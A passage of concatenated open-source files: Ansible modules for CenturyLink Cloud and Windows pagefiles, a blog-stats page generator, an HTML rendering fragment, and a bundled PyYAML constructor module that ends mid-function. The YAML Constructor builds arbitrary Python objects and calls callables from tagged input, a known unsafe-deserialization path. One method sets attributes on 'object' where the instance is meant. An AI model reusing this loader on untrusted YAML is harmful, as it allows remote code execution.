html += "<div style=\"float:right;\" "
html += '<img alt="%s" src="/images/stock-stop.png" \n' % _('Close')
html += " title='"+_("Close")+"' border='0' align='middle' \n"
html += "onmousedown=\"Javascript:hideMe();\"/></div>\n"
if self.idevice.purpose != "":
html += "<b>Purpose:</b><br/>%s<br/>" % self.purpose
if self.idevice.tip != "":
html += "<b>Tip:</b><br/>%s<br/>" % self.idevice.tip
html += "</div>\n"
html += "</div>\n"
self.message = ""
return html
def __renderStyles(self):
"""
Return xhtml string for rendering styles select
"""
html = '<select onchange="submitStyle();" name="styleSelect">\n'
idx = 0
for style in self.styles:
html += "<option value='%d' " % idx
if self.style.get_name() == style.get_name():
html += "selected "
html += ">" + style.get_name() + "</option>\n"
idx = idx + 1
html += "</select> \n"
return html
def __renderIcons(self):
"""
Return xhtml string for dispay all icons
"""
iconpath = self.style.get_style_dir()
iconfiles = iconpath.files("icon_*")
html = ""
for iconfile in iconfiles:
iconname = iconfile.namebase
icon = iconname.split("_", 1)[1]
filename = "/style/%s/%s.gif" % (self.style.get_dirname(), iconname)
html += u'<div style="float:left; text-align:center; width:80px;\n'
html += u'margin-right:10px; margin-bottom:10px" > '
html += u'<img src="%s" \n' % filename
html += u' alt="%s" ' % _("Submit")
html += u"onclick=\"submitLink('selectIcon','%s',1)\">\n" % icon
html += u'<br/>%s.gif</div>\n' % icon
return html
# ===========================================================================
| gpl-2.0 |
sestrella/ansible | lib/ansible/modules/cloud/centurylink/clc_blueprint_package.py | 21 | 10274 | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: clc_blueprint_package
short_description: deploys a blue print package on a set of servers in CenturyLink Cloud.
description:
- An Ansible module to deploy blue print package on a set of servers in CenturyLink Cloud.
version_added: "2.0"
options:
server_ids:
description:
- A list of server Ids to deploy the blue print package.
required: True
package_id:
description:
- The package id of the blue print.
required: True
package_params:
description:
- The dictionary of arguments required to deploy the blue print.
default: {}
required: False
state:
description:
- Whether to install or uninstall the package. Currently it supports only "present" for install action.
required: False
default: present
choices: ['present']
wait:
description:
- Whether to wait for the tasks to finish before returning.
type: bool
default: True
required: False
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
- To use this module, it is required to set the below environment variables which enables access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples
- name: Deploy package
clc_blueprint_package:
server_ids:
- UC1TEST-SERVER1
- UC1TEST-SERVER2
package_id: 77abb844-579d-478d-3955-c69ab4a7ba1a
package_params: {}
'''
RETURN = '''
server_ids:
description: The list of server ids that are changed
returned: success
type: list
sample:
[
"UC1TEST-SERVER1",
"UC1TEST-SERVER2"
]
'''
__version__ = '${version}'
import os
import traceback
from distutils.version import LooseVersion
REQUESTS_IMP_ERR = None
try:
import requests
except ImportError:
REQUESTS_IMP_ERR = traceback.format_exc()
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
CLC_IMP_ERR = None
try:
import clc as clc_sdk
from clc import CLCException
except ImportError:
CLC_IMP_ERR = traceback.format_exc()
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
class ClcBlueprintPackage:
clc = clc_sdk
module = None
def __init__(self, module):
"""
Construct module
"""
self.module = module
if not CLC_FOUND:
self.module.fail_json(msg=missing_required_lib('clc-sdk'), exception=CLC_IMP_ERR)
if not REQUESTS_FOUND:
self.module.fail_json(msg=missing_required_lib('requests'), exception=REQUESTS_IMP_ERR)
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Process the request - Main Code Path
:return: Returns with either an exit_json or fail_json
"""
p = self.module.params
changed = False
changed_server_ids = []
self._set_clc_credentials_from_env()
server_ids = p['server_ids']
package_id = p['package_id']
package_params = p['package_params']
state = p['state']
if state == 'present':
changed, changed_server_ids, request_list = self.ensure_package_installed(
server_ids, package_id, package_params)
self._wait_for_requests_to_complete(request_list)
self.module.exit_json(changed=changed, server_ids=changed_server_ids)
@staticmethod
def define_argument_spec():
"""
This function defines the dictionary object required for
package module
:return: the package dictionary object
"""
argument_spec = dict(
server_ids=dict(type='list', required=True),
package_id=dict(required=True),
package_params=dict(type='dict', default={}),
wait=dict(default=True),
state=dict(default='present', choices=['present'])
)
return argument_spec
def ensure_package_installed(self, server_ids, package_id, package_params):
"""
Ensure the package is installed in the given list of servers
:param server_ids: the server list where the package needs to be installed
:param package_id: the blueprint package id
:param package_params: the package arguments
:return: (changed, server_ids, request_list)
changed: A flag indicating if a change was made
server_ids: The list of servers modified
request_list: The list of request objects from clc-sdk
"""
changed = False
request_list = []
servers = self._get_servers_from_clc(
server_ids,
'Failed to get servers from CLC')
for server in servers:
if not self.module.check_mode:
request = self.clc_install_package(
server,
package_id,
package_params)
request_list.append(request)
changed = True
return changed, server_ids, request_list
def clc_install_package(self, server, package_id, package_params):
"""
Install the package to a given clc server
:param server: The server object where the package needs to be installed
:param package_id: The blue print package id
:param package_params: the required argument dict for the package installation
:return: The result object from the CLC API call
"""
result = None
try:
result = server.ExecutePackage(
package_id=package_id,
parameters=package_params)
except CLCException as ex:
self.module.fail_json(msg='Failed to install package : {0} to server {1}. {2}'.format(
package_id, server.id, ex.message
))
return result
def _wait_for_requests_to_complete(self, request_lst):
"""
Waits until the CLC requests are complete if the wait argument is True
:param request_lst: The list of CLC request objects
:return: none
"""
if not self.module.params['wait']:
return
for request in request_lst:
request.WaitUntilComplete()
for request_details in request.requests:
if request_details.Status() != 'succeeded':
self.module.fail_json(
msg='Unable to process package install request')
def _get_servers_from_clc(self, server_list, message):
"""
Internal function to fetch list of CLC server objects from a list of server ids
:param server_list: the list of server ids
:param message: the error message to raise if there is any error
:return the list of CLC server objects
"""
try:
return self.clc.v2.Servers(server_list).servers
except CLCException as ex:
self.module.fail_json(msg=message + ': %s' % ex)
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
Main function
:return: None
"""
module = AnsibleModule(
argument_spec=ClcBlueprintPackage.define_argument_spec(),
supports_check_mode=True
)
clc_blueprint_package = ClcBlueprintPackage(module)
clc_blueprint_package.process_request()
if __name__ == '__main__':
main()
| gpl-3.0 |
veger/ansible | lib/ansible/modules/windows/win_pagefile.py | 28 | 3980 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Liran Nisanov <lirannis@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_pagefile
version_added: "2.4"
short_description: Query or change pagefile configuration
description:
- Query current pagefile configuration.
- Enable/Disable AutomaticManagedPagefile.
- Create new or override pagefile configuration.
options:
drive:
description:
- The drive of the pagefile.
initial_size:
description:
- The initial size of the pagefile in megabytes.
type: int
maximum_size:
description:
- The maximum size of the pagefile in megabytes.
type: int
override:
description:
- Override the current pagefile on the drive.
type: bool
default: 'yes'
system_managed:
description:
- Configures current pagefile to be managed by the system.
type: bool
default: 'no'
automatic:
description:
- Configures AutomaticManagedPagefile for the entire system.
type: bool
remove_all:
description:
- Remove all pagefiles in the system, not including automatic managed.
type: bool
default: 'no'
test_path:
description:
- Use Test-Path on the drive to make sure the drive is accessible before creating the pagefile.
type: bool
default: 'yes'
state:
description:
- State of the pagefile.
choices: [ absent, present, query ]
default: query
notes:
- There is difference between automatic managed pagefiles that configured once for the entire system and system managed pagefile that configured per pagefile.
- InitialSize 0 and MaximumSize 0 means the pagefile is managed by the system.
- Value out of range exception may be caused by several different issues, two common problems - No such drive, Pagefile size is too small.
- Setting a pagefile when AutomaticManagedPagefile is on will disable the AutomaticManagedPagefile.
author:
- Liran Nisanov (@LiranNis)
'''
EXAMPLES = r'''
- name: Query pagefiles configuration
win_pagefile:
- name: Query C pagefile
win_pagefile:
drive: C
- name: Set C pagefile, don't override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
override: no
state: present
- name: Set C pagefile, override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
state: present
- name: Remove C pagefile
win_pagefile:
drive: C
state: absent
- name: Remove all current pagefiles, enable AutomaticManagedPagefile and query at the end
win_pagefile:
remove_all: yes
automatic: yes
- name: Remove all pagefiles disable AutomaticManagedPagefile and set C pagefile
win_pagefile:
drive: C
initial_size: 2048
maximum_size: 2048
remove_all: yes
automatic: no
state: present
- name: Set D pagefile, override if exists
win_pagefile:
drive: d
initial_size: 1024
maximum_size: 1024
state: present
'''
RETURN = r'''
automatic_managed_pagefiles:
description: Whether the pagefiles is automatically managed.
returned: When state is query.
type: boolean
sample: true
pagefiles:
description: Contains caption, description, initial_size, maximum_size and name for each pagefile in the system.
returned: When state is query.
type: list
sample:
[{"caption": "c:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ c:\\", "initial_size": 2048, "maximum_size": 2048, "name": "c:\\pagefile.sys"},
{"caption": "d:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ d:\\", "initial_size": 1024, "maximum_size": 1024, "name": "d:\\pagefile.sys"}]
'''
| gpl-3.0 |
mathblogging/mathblogging | statsview.py | 2 | 5717 | from main import *
class StatsViewBase(TemplatePage):
def generateContent(self):
output = []
output.append("""
<div class="tocbox">
<ul>
<li><a href="/bystats" title="Recent stats">All</a> </li>
<li><a href="/bystats-researchers" title="Recent stats for Researchers">Researchers</a>
</li>
<li><a href="/bystats-educators" title="Recent stats for Educators">Educators</a>
</li>
<li><a href="/bystats-artvis" title="Recent stats for Art, Visual">Art/Visual</a>
</li>
</ul>
</div>
<h2> The latests stats %(title)s </h2>
<table class="bydate" id="commentsperday">
<thead>
<tr>
<th align="left" class="datecolumn">
</th>
<th align="left" class="blogcolumn">
Comments last 24h
</th>
</tr>
</thead>
<tbody>"""% {'title':html_escape(self.selftitle)})
for feed in Feed.gql("WHERE category IN :1 ORDER BY comments_day DESC", self.categories()):
output.append("""
<tr>
<td valign="bottom" class="datecolumn">
%(comments_day)s
</td>
<td valign="bottom" class="blogcolumn">
<a href="%(homepage)s">%(title)s</a>
</td>
</tr>""" % {'comments_day': str(feed.comments_day), 'homepage': html_escape(feed.homepage), 'title': html_escape(feed.title) })
output.append("""
</tbody>
</table>""")
output.append("""
<table class="bydate" id="commentsperweek">
<thead>
<tr>
<th align="left" class="datecolumn">
</th>
<th align="left" class="blogcolumn">
Comments last week
</th>
</tr>
</thead>
<tbody>""")
for feed in Feed.gql("WHERE category IN :1 ORDER BY comments_week DESC", self.categories()):
output.append("""
<tr>
<td valign="bottom" class="datecolumn">
%(comments_week)s
</td>
<td valign="bottom" class="blogcolumn">
<a href="%(homepage)s">%(title)s</a>
</td>
</tr>""" % {'comments_week': str(feed.comments_week), 'homepage': html_escape(feed.homepage), 'title': html_escape(feed.title) })
output.append("""
</tbody>
</table>""")
output.append("""
<table class="bydate" id="postsperweek">
<thead>
<tr>
<th align="left" class="datecolumn">
</th>
<th align="left" class="blogcolumn">
Posts last week
</th>
</tr>
</thead>
<tbody>""")
for feed in Feed.gql("WHERE category IN :1 ORDER BY posts_week DESC", self.categories()):
output.append("""
<tr>
<td valign="bottom" class="datecolumn">
%(posts_week)s
</td>
<td valign="bottom" class="blogcolumn">
<a href="%(homepage)s">%(title)s</a>
</td>
</tr>""" % {'posts_week': str(feed.posts_week), 'homepage': html_escape(feed.homepage), 'title': html_escape(feed.title) })
output.append("""
</tbody>
</table>""")
output.append("""
<table class="bydate" id="postspermonth">
<thead>
<tr>
<th align="left" class="datecolumn">
</th>
<th align="left" class="blogcolumn">
Posts last month
</th>
</tr>
</thead>
<tbody>""")
for feed in Feed.gql("WHERE category IN :1 ORDER BY posts_month DESC", self.categories()):
output.append("""
<tr>
<td valign="bottom" class="datecolumn">
%(posts_month)s
</td>
<td valign="bottom" class="blogcolumn">
<a href="%(homepage)s">%(title)s</a>
</td>
</tr>""" % {'posts_month': str(feed.posts_month), 'homepage': html_escape(feed.homepage), 'title': html_escape(feed.title) })
output.append("""
</tbody>
</table>""")
return "".join(output)
class StatsView(StatsViewBase):
selfurl = "bystats"
selftitle = ""
cacheName = "StatsView"
def categories(self):
return ['history','fun','general','commercial','art','visual','pure','applied','teacher','journalism']
class StatsViewResearchers(StatsViewBase):
selfurl = "bystats-researchers"
selftitle = " for researchers"
cacheName = "StatsViewResearchers"
def categories(self):
return ['history','pure','applied','general']
class StatsViewEducators(StatsViewBase):
selfurl = "bystats-educators"
selftitle = " for educators"
cacheName = "StatsViewEducators"
def categories(self):
return ['teacher']
class StatsViewArtVis(StatsViewBase):
selfurl = "bystats-artvis"
selftitle = " for art and visual"
cacheName = "StatsViewArtVis"
def categories(self):
return ['art','visual']
| agpl-3.0 |
mloesch/tablib | tablib/packages/yaml3/constructor.py | 83 | 25554 |
__all__ = ['BaseConstructor', 'SafeConstructor', 'Constructor',
'ConstructorError']
from .error import *
from .nodes import *
import collections, datetime, base64, binascii, re, sys, types
class ConstructorError(MarkedYAMLError):
pass
class BaseConstructor:
yaml_constructors = {}
yaml_multi_constructors = {}
def __init__(self):
self.constructed_objects = {}
self.recursive_objects = {}
self.state_generators = []
self.deep_construct = False
def check_data(self):
# If there are more documents available?
return self.check_node()
def get_data(self):
# Construct and return the next document.
if self.check_node():
return self.construct_document(self.get_node())
def get_single_data(self):
# Ensure that the stream contains a single document and construct it.
node = self.get_single_node()
if node is not None:
return self.construct_document(node)
return None
def construct_document(self, node):
data = self.construct_object(node)
while self.state_generators:
state_generators = self.state_generators
self.state_generators = []
for generator in state_generators:
for dummy in generator:
pass
self.constructed_objects = {}
self.recursive_objects = {}
self.deep_construct = False
return data
def construct_object(self, node, deep=False):
if deep:
old_deep = self.deep_construct
self.deep_construct = True
if node in self.constructed_objects:
return self.constructed_objects[node]
if node in self.recursive_objects:
raise ConstructorError(None, None,
"found unconstructable recursive node", node.start_mark)
self.recursive_objects[node] = None
constructor = None
tag_suffix = None
if node.tag in self.yaml_constructors:
constructor = self.yaml_constructors[node.tag]
else:
for tag_prefix in self.yaml_multi_constructors:
if node.tag.startswith(tag_prefix):
tag_suffix = node.tag[len(tag_prefix):]
constructor = self.yaml_multi_constructors[tag_prefix]
break
else:
if None in self.yaml_multi_constructors:
tag_suffix = node.tag
constructor = self.yaml_multi_constructors[None]
elif None in self.yaml_constructors:
constructor = self.yaml_constructors[None]
elif isinstance(node, ScalarNode):
constructor = self.__class__.construct_scalar
elif isinstance(node, SequenceNode):
constructor = self.__class__.construct_sequence
elif isinstance(node, MappingNode):
constructor = self.__class__.construct_mapping
if tag_suffix is None:
data = constructor(self, node)
else:
data = constructor(self, tag_suffix, node)
if isinstance(data, types.GeneratorType):
generator = data
data = next(generator)
if self.deep_construct:
for dummy in generator:
pass
else:
self.state_generators.append(generator)
self.constructed_objects[node] = data
del self.recursive_objects[node]
if deep:
self.deep_construct = old_deep
return data
def construct_scalar(self, node):
if not isinstance(node, ScalarNode):
raise ConstructorError(None, None,
"expected a scalar node, but found %s" % node.id,
node.start_mark)
return node.value
def construct_sequence(self, node, deep=False):
if not isinstance(node, SequenceNode):
raise ConstructorError(None, None,
"expected a sequence node, but found %s" % node.id,
node.start_mark)
return [self.construct_object(child, deep=deep)
for child in node.value]
def construct_mapping(self, node, deep=False):
if not isinstance(node, MappingNode):
raise ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
mapping = {}
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=deep)
if not isinstance(key, collections.Hashable):
raise ConstructorError("while constructing a mapping", node.start_mark,
"found unhashable key", key_node.start_mark)
value = self.construct_object(value_node, deep=deep)
mapping[key] = value
return mapping
def construct_pairs(self, node, deep=False):
if not isinstance(node, MappingNode):
raise ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
pairs = []
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=deep)
value = self.construct_object(value_node, deep=deep)
pairs.append((key, value))
return pairs
@classmethod
def add_constructor(cls, tag, constructor):
if not 'yaml_constructors' in cls.__dict__:
cls.yaml_constructors = cls.yaml_constructors.copy()
cls.yaml_constructors[tag] = constructor
@classmethod
def add_multi_constructor(cls, tag_prefix, multi_constructor):
if not 'yaml_multi_constructors' in cls.__dict__:
cls.yaml_multi_constructors = cls.yaml_multi_constructors.copy()
cls.yaml_multi_constructors[tag_prefix] = multi_constructor
class SafeConstructor(BaseConstructor):
def construct_scalar(self, node):
if isinstance(node, MappingNode):
for key_node, value_node in node.value:
if key_node.tag == 'tag:yaml.org,2002:value':
return self.construct_scalar(value_node)
return super().construct_scalar(node)
def flatten_mapping(self, node):
merge = []
index = 0
while index < len(node.value):
key_node, value_node = node.value[index]
if key_node.tag == 'tag:yaml.org,2002:merge':
del node.value[index]
if isinstance(value_node, MappingNode):
self.flatten_mapping(value_node)
merge.extend(value_node.value)
elif isinstance(value_node, SequenceNode):
submerge = []
for subnode in value_node.value:
if not isinstance(subnode, MappingNode):
raise ConstructorError("while constructing a mapping",
node.start_mark,
"expected a mapping for merging, but found %s"
% subnode.id, subnode.start_mark)
self.flatten_mapping(subnode)
submerge.append(subnode.value)
submerge.reverse()
for value in submerge:
merge.extend(value)
else:
raise ConstructorError("while constructing a mapping", node.start_mark,
"expected a mapping or list of mappings for merging, but found %s"
% value_node.id, value_node.start_mark)
elif key_node.tag == 'tag:yaml.org,2002:value':
key_node.tag = 'tag:yaml.org,2002:str'
index += 1
else:
index += 1
if merge:
node.value = merge + node.value
def construct_mapping(self, node, deep=False):
if isinstance(node, MappingNode):
self.flatten_mapping(node)
return super().construct_mapping(node, deep=deep)
def construct_yaml_null(self, node):
self.construct_scalar(node)
return None
bool_values = {
'yes': True,
'no': False,
'true': True,
'false': False,
'on': True,
'off': False,
}
def construct_yaml_bool(self, node):
value = self.construct_scalar(node)
return self.bool_values[value.lower()]
def construct_yaml_int(self, node):
value = self.construct_scalar(node)
value = value.replace('_', '')
sign = +1
if value[0] == '-':
sign = -1
if value[0] in '+-':
value = value[1:]
if value == '0':
return 0
elif value.startswith('0b'):
return sign*int(value[2:], 2)
elif value.startswith('0x'):
return sign*int(value[2:], 16)
elif value[0] == '0':
return sign*int(value, 8)
elif ':' in value:
digits = [int(part) for part in value.split(':')]
digits.reverse()
base = 1
value = 0
for digit in digits:
value += digit*base
base *= 60
return sign*value
else:
return sign*int(value)
inf_value = 1e300
while inf_value != inf_value*inf_value:
inf_value *= inf_value
nan_value = -inf_value/inf_value # Trying to make a quiet NaN (like C99).
def construct_yaml_float(self, node):
value = self.construct_scalar(node)
value = value.replace('_', '').lower()
sign = +1
if value[0] == '-':
sign = -1
if value[0] in '+-':
value = value[1:]
if value == '.inf':
return sign*self.inf_value
elif value == '.nan':
return self.nan_value
elif ':' in value:
digits = [float(part) for part in value.split(':')]
digits.reverse()
base = 1
value = 0.0
for digit in digits:
value += digit*base
base *= 60
return sign*value
else:
return sign*float(value)
def construct_yaml_binary(self, node):
try:
value = self.construct_scalar(node).encode('ascii')
except UnicodeEncodeError as exc:
raise ConstructorError(None, None,
"failed to convert base64 data into ascii: %s" % exc,
node.start_mark)
try:
if hasattr(base64, 'decodebytes'):
return base64.decodebytes(value)
else:
return base64.decodestring(value)
except binascii.Error as exc:
raise ConstructorError(None, None,
"failed to decode base64 data: %s" % exc, node.start_mark)
timestamp_regexp = re.compile(
r'''^(?P<year>[0-9][0-9][0-9][0-9])
-(?P<month>[0-9][0-9]?)
-(?P<day>[0-9][0-9]?)
(?:(?:[Tt]|[ \t]+)
(?P<hour>[0-9][0-9]?)
:(?P<minute>[0-9][0-9])
:(?P<second>[0-9][0-9])
(?:\.(?P<fraction>[0-9]*))?
(?:[ \t]*(?P<tz>Z|(?P<tz_sign>[-+])(?P<tz_hour>[0-9][0-9]?)
(?::(?P<tz_minute>[0-9][0-9]))?))?)?$''', re.X)
def construct_yaml_timestamp(self, node):
value = self.construct_scalar(node)
match = self.timestamp_regexp.match(node.value)
values = match.groupdict()
year = int(values['year'])
month = int(values['month'])
day = int(values['day'])
if not values['hour']:
return datetime.date(year, month, day)
hour = int(values['hour'])
minute = int(values['minute'])
second = int(values['second'])
fraction = 0
if values['fraction']:
fraction = values['fraction'][:6]
while len(fraction) < 6:
fraction += '0'
fraction = int(fraction)
delta = None
if values['tz_sign']:
tz_hour = int(values['tz_hour'])
tz_minute = int(values['tz_minute'] or 0)
delta = datetime.timedelta(hours=tz_hour, minutes=tz_minute)
if values['tz_sign'] == '-':
delta = -delta
data = datetime.datetime(year, month, day, hour, minute, second, fraction)
if delta:
data -= delta
return data
def construct_yaml_omap(self, node):
# Note: we do not check for duplicate keys, because it's too
# CPU-expensive.
omap = []
yield omap
if not isinstance(node, SequenceNode):
raise ConstructorError("while constructing an ordered map", node.start_mark,
"expected a sequence, but found %s" % node.id, node.start_mark)
for subnode in node.value:
if not isinstance(subnode, MappingNode):
raise ConstructorError("while constructing an ordered map", node.start_mark,
"expected a mapping of length 1, but found %s" % subnode.id,
subnode.start_mark)
if len(subnode.value) != 1:
raise ConstructorError("while constructing an ordered map", node.start_mark,
"expected a single mapping item, but found %d items" % len(subnode.value),
subnode.start_mark)
key_node, value_node = subnode.value[0]
key = self.construct_object(key_node)
value = self.construct_object(value_node)
omap.append((key, value))
def construct_yaml_pairs(self, node):
# Note: the same code as `construct_yaml_omap`.
pairs = []
yield pairs
if not isinstance(node, SequenceNode):
raise ConstructorError("while constructing pairs", node.start_mark,
"expected a sequence, but found %s" % node.id, node.start_mark)
for subnode in node.value:
if not isinstance(subnode, MappingNode):
raise ConstructorError("while constructing pairs", node.start_mark,
"expected a mapping of length 1, but found %s" % subnode.id,
subnode.start_mark)
if len(subnode.value) != 1:
raise ConstructorError("while constructing pairs", node.start_mark,
"expected a single mapping item, but found %d items" % len(subnode.value),
subnode.start_mark)
key_node, value_node = subnode.value[0]
key = self.construct_object(key_node)
value = self.construct_object(value_node)
pairs.append((key, value))
def construct_yaml_set(self, node):
data = set()
yield data
value = self.construct_mapping(node)
data.update(value)
def construct_yaml_str(self, node):
return self.construct_scalar(node)
def construct_yaml_seq(self, node):
data = []
yield data
data.extend(self.construct_sequence(node))
def construct_yaml_map(self, node):
data = {}
yield data
value = self.construct_mapping(node)
data.update(value)
def construct_yaml_object(self, node, cls):
data = cls.__new__(cls)
yield data
if hasattr(data, '__setstate__'):
state = self.construct_mapping(node, deep=True)
data.__setstate__(state)
else:
state = self.construct_mapping(node)
data.__dict__.update(state)
def construct_undefined(self, node):
raise ConstructorError(None, None,
"could not determine a constructor for the tag %r" % node.tag,
node.start_mark)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:null',
SafeConstructor.construct_yaml_null)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:bool',
SafeConstructor.construct_yaml_bool)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:int',
SafeConstructor.construct_yaml_int)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:float',
SafeConstructor.construct_yaml_float)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:binary',
SafeConstructor.construct_yaml_binary)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:timestamp',
SafeConstructor.construct_yaml_timestamp)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:omap',
SafeConstructor.construct_yaml_omap)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:pairs',
SafeConstructor.construct_yaml_pairs)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:set',
SafeConstructor.construct_yaml_set)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:str',
SafeConstructor.construct_yaml_str)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:seq',
SafeConstructor.construct_yaml_seq)
SafeConstructor.add_constructor(
'tag:yaml.org,2002:map',
SafeConstructor.construct_yaml_map)
SafeConstructor.add_constructor(None,
SafeConstructor.construct_undefined)
class Constructor(SafeConstructor):
def construct_python_str(self, node):
return self.construct_scalar(node)
def construct_python_unicode(self, node):
return self.construct_scalar(node)
def construct_python_bytes(self, node):
try:
value = self.construct_scalar(node).encode('ascii')
except UnicodeEncodeError as exc:
raise ConstructorError(None, None,
"failed to convert base64 data into ascii: %s" % exc,
node.start_mark)
try:
if hasattr(base64, 'decodebytes'):
return base64.decodebytes(value)
else:
return base64.decodestring(value)
except binascii.Error as exc:
raise ConstructorError(None, None,
"failed to decode base64 data: %s" % exc, node.start_mark)
def construct_python_long(self, node):
return self.construct_yaml_int(node)
def construct_python_complex(self, node):
return complex(self.construct_scalar(node))
def construct_python_tuple(self, node):
return tuple(self.construct_sequence(node))
def find_python_module(self, name, mark):
if not name:
raise ConstructorError("while constructing a Python module", mark,
"expected non-empty name appended to the tag", mark)
try:
__import__(name)
except ImportError as exc:
raise ConstructorError("while constructing a Python module", mark,
"cannot find module %r (%s)" % (name, exc), mark)
return sys.modules[name]
def find_python_name(self, name, mark):
if not name:
raise ConstructorError("while constructing a Python object", mark,
"expected non-empty name appended to the tag", mark)
if '.' in name:
module_name, object_name = name.rsplit('.', 1)
else:
module_name = 'builtins'
object_name = name
try:
__import__(module_name)
except ImportError as exc:
raise ConstructorError("while constructing a Python object", mark,
"cannot find module %r (%s)" % (module_name, exc), mark)
module = sys.modules[module_name]
if not hasattr(module, object_name):
raise ConstructorError("while constructing a Python object", mark,
"cannot find %r in the module %r"
% (object_name, module.__name__), mark)
return getattr(module, object_name)
def construct_python_name(self, suffix, node):
value = self.construct_scalar(node)
if value:
raise ConstructorError("while constructing a Python name", node.start_mark,
"expected the empty value, but found %r" % value, node.start_mark)
return self.find_python_name(suffix, node.start_mark)
def construct_python_module(self, suffix, node):
value = self.construct_scalar(node)
if value:
raise ConstructorError("while constructing a Python module", node.start_mark,
"expected the empty value, but found %r" % value, node.start_mark)
return self.find_python_module(suffix, node.start_mark)
def make_python_instance(self, suffix, node,
args=None, kwds=None, newobj=False):
if not args:
args = []
if not kwds:
kwds = {}
cls = self.find_python_name(suffix, node.start_mark)
if newobj and isinstance(cls, type):
return cls.__new__(cls, *args, **kwds)
else:
return cls(*args, **kwds)
def set_python_instance_state(self, instance, state):
if hasattr(instance, '__setstate__'):
instance.__setstate__(state)
else:
slotstate = {}
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if hasattr(instance, '__dict__'):
instance.__dict__.update(state)
elif state:
slotstate.update(state)
for key, value in slotstate.items():
setattr(object, key, value)
def construct_python_object(self, suffix, node):
# Format:
# !!python/object:module.name { ... state ... }
instance = self.make_python_instance(suffix, node, newobj=True)
yield instance
deep = hasattr(instance, '__setstate__')
state = self.construct_mapping(node, deep=deep)
self.set_python_instance_state(instance, state)
def construct_python_object_apply(self, suffix, node, newobj=False):
# Format:
# !!python/object/apply # (or !!python/object/new)
# args: [ ... arguments ... ]
# kwds: { ... keywords ... }
# state: ... state ...
# listitems: [ ... listitems ... ]
# dictitems: { ... dictitems ... }
# or short format:
# !!python/object/apply [ ... arguments ... ]
# The difference between !!python/object/apply and !!python/object/new
# is how an object is created, check make_python_instance for details.
if isinstance(node, SequenceNode):
args = self.construct_sequence(node, deep=True)
kwds = {}
state = {}
listitems = []
dictitems = {}
else:
value = self.construct_mapping(node, deep=True)
args = value.get('args', [])
kwds = value.get('kwds', {})
state = value.get('state', {})
listitems = value.get('listitems', [])
dictitems = value.get('dictitems', {})
instance = self.make_python_instance(suffix, node, args, kwds, newobj)
if state:
self.set_python_instance_state(instance, state)
if listitems:
instance.extend(listitems)
if dictitems:
for key in dictitems:
instance[key] = dictitems[key]
return instance
def construct_python_object_new(self, suffix, node):
